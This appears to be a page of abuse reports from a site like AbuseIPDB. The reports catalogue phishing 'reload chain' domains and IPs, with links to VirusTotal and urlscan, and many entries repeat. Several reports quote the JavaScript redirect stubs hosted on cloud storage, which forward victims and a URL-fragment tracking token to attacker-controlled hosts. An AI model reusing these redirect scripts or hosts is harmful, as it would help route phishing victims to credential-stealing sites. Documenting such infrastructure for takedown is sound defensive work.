stranilk.com
Part of phishing reload chain used by phishing criminals,
Malicious, see:
https: ...
show morestranilk.com
Part of phishing reload chain used by phishing criminals,
Malicious, see:
https://urlscan.io/search/#stranilk.com
https://www.virustotal.com/gui/domain/stranilk.com
show less
moviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Source:
<s ...
show moremoviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Source:
<script>document.location.href = 'http://moviedownloadserver.com//anchor'+window.location.href.split('#')[1];</script>
Script used to redirect victims to another domain, passing thru some parameters.
Malicious, see:
https://www.virustotal.com/gui/domain/moviedownloadserver.com
https://urlscan.io/search/#moviedownloadserver.com
show less
https://storage.googleapis.com/mabololoxy/besales24.html
Google does not take action against this ...
show morehttps://storage.googleapis.com/mabololoxy/besales24.html
Google does not take action against this malicious content.
has the following content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.129.110";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Reloads to 185.80.129.110
Malicious IP:
https://www.virustotal.com/gui/ip-address/185.80.129.110
https://urlscan.io/search/#185.80.129.110
[email protected] does not take action to remove the content on this IP
@RIPE: it is time to remove all IP-ranges from VPSNET.LT. Reporting abuse has no effect.
show less
0peno1.store
https://storage.googleapis.com/mastfox/masterxifo.html
Source:
<meta http-equiv= ...
show more0peno1.store
https://storage.googleapis.com/mastfox/masterxifo.html
Source:
<meta http-equiv="refresh" content="3; url=">
<script>document.location.href='http://0peno1.store/'+window.location.href.split('#')[1];</script>
Takes tracking parameters and redirects phishing victims to the next website 0peno1.store.
Malicious, see:
https://www.virustotal.com/gui/domain/0peno1.store
https://urlscan.io/search/#0peno1.store
show less
Nameserver used for 185.80.129.110, which is malicious:
https://www.virustotal.com/gui/ip-address/1 ...
show moreNameserver used for 185.80.129.110, which is malicious:
https://www.virustotal.com/gui/ip-address/185.80.129.110
show less
Nameserver used for 185.80.129.110, which is malicious:
https://www.virustotal.com/gui/ip-address/1 ...
show moreNameserver used for 185.80.129.110, which is malicious:
https://www.virustotal.com/gui/ip-address/185.80.129.110
show less
https://storage.googleapis.com/mabololoxy/besales24.html
Google does not take action against this ...
show morehttps://storage.googleapis.com/mabololoxy/besales24.html
Google does not take action against this malicious content.
has the following content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.129.110";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Reloads to 185.80.129.110
Malicious IP:
https://www.virustotal.com/gui/ip-address/185.80.129.110
https://urlscan.io/search/#185.80.129.110
[email protected] does not take action to remove the content on this IP
@RIPE: it is time to remove all IP-ranges from VPSNET.LT. Reporting abuse has no effect.
show less
https://storage.googleapis.com/absales/azer2400.html
Source code:
<script>
var tarcking_param ...
show morehttps://storage.googleapis.com/absales/azer2400.html
Source code:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.130.183";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Reloads to malicious IP:
See
https://urlscan.io/search/#185.80.130.183
https://www.virustotal.com/gui/ip-address/185.80.130.183
show less
cloudfreez.ru.com
https://storage.googleapis.com/redid21dfh/allfeallcolkdf.html
Content:
<scr ...
show morecloudfreez.ru.com
https://storage.googleapis.com/redid21dfh/allfeallcolkdf.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "cloudfreez.ru.com";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/'+tarcking_param;
}
</script>
Script is used for redirection to a malicious domain cloudfreez.ru.com
Malicious, see:
https://www.virustotal.com/gui/ip-address/104.21.48.1
show less
collaboratecode.com
Part of phishing reload chainโฆ
Malicious, see
https://urlscan.io/search/#c ...
show morecollaboratecode.com
Part of phishing reload chainโฆ
Malicious, see
https://urlscan.io/search/#collaboratecode.com
https://www.virustotal.com/gui/domain/collaboratecode.com
show less
https://storage.googleapis.com/absales/azer2400.html
Source code:
<script>
var tarcking_param ...
show morehttps://storage.googleapis.com/absales/azer2400.html
Source code:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.130.183";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Reloads to malicious IP:
See
https://urlscan.io/search/#185.80.130.183
https://www.virustotal.com/gui/ip-address/185.80.130.183
show less
malagaopensoffer.live
https://storage.googleapis.com/abdilahmokhtar/abdilahmokhtar.html
Conten ...
show moremalagaopensoffer.live
https://storage.googleapis.com/abdilahmokhtar/abdilahmokhtar.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "malagaopensoffer.live";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'https://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Script used by phishing criminals to track phishing victims and to reload phishing victims to the actual phishing website
Malicious, see
https://www.virustotal.com/gui/domain/malagaopensoffer.live
https://urlscan.io/search/#malagaopensoffer.live
show less
moviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
<script>docum ...
show moremoviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
<script>document.location.href = 'http://moviedownloadserver.com//anchor'+window.location.href.split('#')[1];</script>
Script used to take the string after # to redirect victims to another phishing website and to track them.
Malicious, see
https://urlscan.io/search/#moviedownloadserver.com
https://www.virustotal.com/gui/domain/moviedownloadserver.com
show less
moviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
<script>docum ...
show moremoviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
<script>document.location.href = 'http://moviedownloadserver.com//anchor'+window.location.href.split('#')[1];</script>
Script used to take the string after # to redirect victims to another phishing website and to track them.
Malicious, see
https://urlscan.io/search/#moviedownloadserver.com
https://www.virustotal.com/gui/domain/moviedownloadserver.com
show less
buysalesclub.com
Malicious, see:
https://www.virustotal.com/gui/domain/buysalesclub.com
https:/ ...
show morebuysalesclub.com
Malicious, see:
https://www.virustotal.com/gui/domain/buysalesclub.com
https://urlscan.io/search/#buysalesclub.com
show less
moviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
<script>docum ...
show moremoviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
<script>document.location.href = 'http://moviedownloadserver.com//anchor'+window.location.href.split('#')[1];</script>
Script used to take the string after # to redirect victims to another phishing website and to track them.
Malicious, see
https://urlscan.io/search/#moviedownloadserver.com
https://www.virustotal.com/gui/domain/moviedownloadserver.com
show less
moviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
<script>docum ...
show moremoviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
<script>document.location.href = 'http://moviedownloadserver.com//anchor'+window.location.href.split('#')[1];</script>
Script used to take the string after # to redirect victims to another phishing website and to track them.
Malicious, see
https://urlscan.io/search/#moviedownloadserver.com
https://www.virustotal.com/gui/domain/moviedownloadserver.com
show less
shopsplumbing.com
https://storage.googleapis.com/ch4tjzenymhiy7p0/56cb2ff.html
Content:
<scri ...
show moreshopsplumbing.com
https://storage.googleapis.com/ch4tjzenymhiy7p0/56cb2ff.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://shopsplumbing.com";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
If a string longer than characters is present, this string is used by shopsplumbing.com to track the phishing victim and to redirect the victim to the real phishing site, like summitray.com (https://www.virustotal.com/gui/domain/summitray.com)
Malicious:
https://www.virustotal.com/gui/domain/shopsplumbing.com
https://urlscan.io/search/#shopsplumbing.com
show less
shopsplumbing.com
https://storage.googleapis.com/586gmkl0zx48ns97/b64f56d.html
Content:
<scri ...
show moreshopsplumbing.com
https://storage.googleapis.com/586gmkl0zx48ns97/b64f56d.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://shopsplumbing.com";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
If a string longer than characters is present, this string is used by shopsplumbing.com to track the phishing victim and to redirect the victim to the real phishing site, like summitray.com (https://www.virustotal.com/gui/domain/summitray.com)
Malicious:
https://www.virustotal.com/gui/domain/shopsplumbing.com
https://urlscan.io/search/#shopsplumbing.com
show less
PhishingEmail Spam
By clicking โAccept allโ, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.